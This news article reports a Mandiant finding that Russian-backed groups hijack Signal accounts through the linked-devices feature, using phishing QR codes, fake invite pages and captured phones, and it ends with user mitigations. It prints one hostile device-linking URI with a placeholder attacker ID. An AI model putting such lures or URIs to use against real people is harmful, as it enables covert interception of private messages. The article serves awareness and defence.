Russian Hackers Exploit Signal's Linked Devices Feature for Espionage

Cybersecurity experts at Mandiant are raising concerns over a sophisticated attack technique being leveraged by Russian-backed hacking groups to intercept encrypted conversations on Signal Messenger. The attack method, which exploits Signal’s linked devices feature, allows adversaries to gain persistent access to users’ messages without breaking encryption protocols.

How Hackers Are Exploiting Signal's Features

In a newly published report, Mandiant threat researcher Dan Black highlights that multiple Advanced Persistent Threat (APT) groups have perfected a way to secretly link their own devices to a victim’s Signal account. By leveraging phishing techniques, adversaries trick users into scanning malicious QR codes, enabling attackers to stealthily add their own device as a linked endpoint.

Once this connection is established, every message sent or received by the victim is duplicated in real-time to the attacker’s device, effectively sidestepping end-to-end encryption protections.

Mandiant warns that Signal’s popularity among military personnel, journalists, activists, and politicians makes it an attractive target for nation-state actors conducting surveillance and espionage operations.

Tactics Used by Russian-Aligned Threat Actors

1. Phishing Campaigns with Malicious QR Codes

Hackers are using a variety of phishing techniques to trick users into linking a compromised device to their Signal account:

• Fake Signal group invite links embedded in phishing emails and fraudulent websites.

• Spoofed device-pairing instructions that appear to be legitimate Signal setup pages.

• Social engineering attacks in which users are convinced to scan a malicious QR code under false pretenses.

2. Targeting Captured Battlefield Devices

Mandiant also uncovered cases where Russian military forces have used captured mobile devices to establish a linked device connection between a victim’s Signal account and an attacker-controlled server. This tactic, particularly used by the Sandworm hacking group, enables Russian forces to extract sensitive battlefield intelligence.

3. Manipulated Signal Group Invite Pages

Another observed tactic involves modifying legitimate Signal group invitations:

• Hackers host their own fake invite pages that closely resemble authentic Signal invitations.

• Instead of redirecting users to join a group, the JavaScript code is altered to automatically link a new device to the victim’s account.

• The fraudulent page executes the command:
  sgnl://linkdevice?uuid= (attacker-controlled device ID).

4. Targeting Ukrainian Military Personnel

A separate Russian-backed hacking group has specifically targeted the Ukrainian military, using a custom-built phishing kit designed to mimic Kropyva, the artillery guidance software used by Ukraine’s Armed Forces. Attackers attempt to disguise the device-linking process as an invite to a Signal group from a trusted contact.

Additionally, attackers deploy JavaScript payloads to extract:

• Basic user information

• Geolocation data (via the browser’s GeoLocation API)

Mandiant believes these attacks indicate an increasing focus on location tracking, particularly for military and intelligence-gathering purposes.

Implications for Secure Messaging

These attacks illustrate a major security challenge for end-to-end encryption messaging platforms like Signal, WhatsApp, and Telegram:

• Encryption remains intact, but social engineering techniques enable attackers to gain access without breaking cryptographic protections.

• Device-linking attacks are difficult to detect, as Signal does not centrally monitor linked devices for suspicious activity.

• Surveillance risks increase for high-profile users who rely on Signal for secure communications.

Mitigation Strategies for Signal Users

To protect against these attacks, Mandiant recommends that users take the following precautions:

1. Enable a Screen Lock

   • Use a strong passcode with a mix of uppercase/lowercase letters, numbers, and symbols.

2. Regularly Audit Linked Devices

   • In Signal settings, navigate to "Linked Devices" to check for unauthorized connections.

   • Immediately remove any unfamiliar devices.

3. Beware of QR Code Scams

   • Never scan a QR code unless you are certain of its authenticity.

   • Avoid clicking on group invite links from untrusted sources.

4. Keep Signal Updated

   • Always install the latest version of Signal and keep your operating system updated to minimize vulnerabilities.

Conclusion

Mandiant’s findings underscore how nation-state actors continue to evolve their techniques to compromise secure messaging platforms. While Signal’s encryption remains intact, attackers are exploiting human vulnerabilities through phishing and social engineering to bypass security controls.

For users, particularly those in high-risk environments, maintaining vigilance against phishing attacks and regularly reviewing linked devices is essential to protect sensitive communications from being intercepted.